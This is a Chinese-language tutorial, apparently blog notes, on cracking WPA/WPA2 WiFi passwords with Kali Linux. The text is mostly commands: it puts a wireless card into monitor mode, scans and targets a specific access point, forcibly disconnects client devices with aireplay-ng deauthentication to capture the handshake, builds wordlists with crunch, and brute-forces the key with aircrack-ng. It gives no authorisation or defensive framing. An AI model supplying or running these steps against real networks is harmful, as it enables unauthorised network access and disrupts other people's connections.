准备
kali安装:
Kali官网:
Kali下载地址:
安装教程地址:
Kali 2020.2虚拟机安装及安装后配置教程(图文小白版)_羽路星尘的博客-CSDN博客_kali虚拟机安装教程
虚拟机→可移动设备→Ralink 802.11n WLAN→链接主机
USB无线网卡
字典
管理员登录
sudo su
无线WiFi渗透
- WPA破解 aircrack-ng破解WPA/WPA2加密
ifconfig 此时wlan0不显示监听模式,开启监听
airmon-ng start wlan0
ifconfig此时wlan0为监听模式,显示wlan0mon
若此时wlan0还是wlan0,不一定是没有开启
获取目标信息,扫描wlan0附近wifi
airodump-ng wlan0mon
BSSID AP的MAC地址
PWR 信号强度接近0信号好
Beacons 无线ap的发送通告,告诉我是谁 周期发送
#Data 抓到的数据包
CH 信道
MB 最大传输速度
ENC 加密方法
CIPHER 加密算法
AUTH 认证协议
监听指定的wifi
airodump-ng -w [文件] --bssid [wifi的bssid] -c [信道最好指定] wlan0mon
例:airodump-ng -c 1 --bssid 5a:d8:2b:9f:4a:53 -w wap wlan0mon
x跑包,通过字典获取WiFi密码
例: aircrack-ng -a2 -b 5A:D8:**:**:**:53 -w /home/kali/Desktop/pass.txt wap-01.cap
BSSID 字典的路径、字典的名 握手包,可以通wireshark查看
如果获取不到握手包:
该步骤可能需要重启
例子:sudo aireplay-ng -0 2 -a 04:**:**:C3:14:A9 -c 38:01:**:**:**:20 wlan0mon
参数解释:
-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)
-a 指定无线路由器BSSID
-c 指定强制断开的设备
wlan0mon最后是指定网卡接口
生成字典
crunch 最短长度 最大长度 字符集 选项
crunch 6 12 -f /use/share/crunch/charset.lst ualpho -o /home/kali/Desktop/pass.txt
布置的字典破解
例子:crunch 9 9 123456789 | aircrack-ng wap-01.cap -e vivo -w -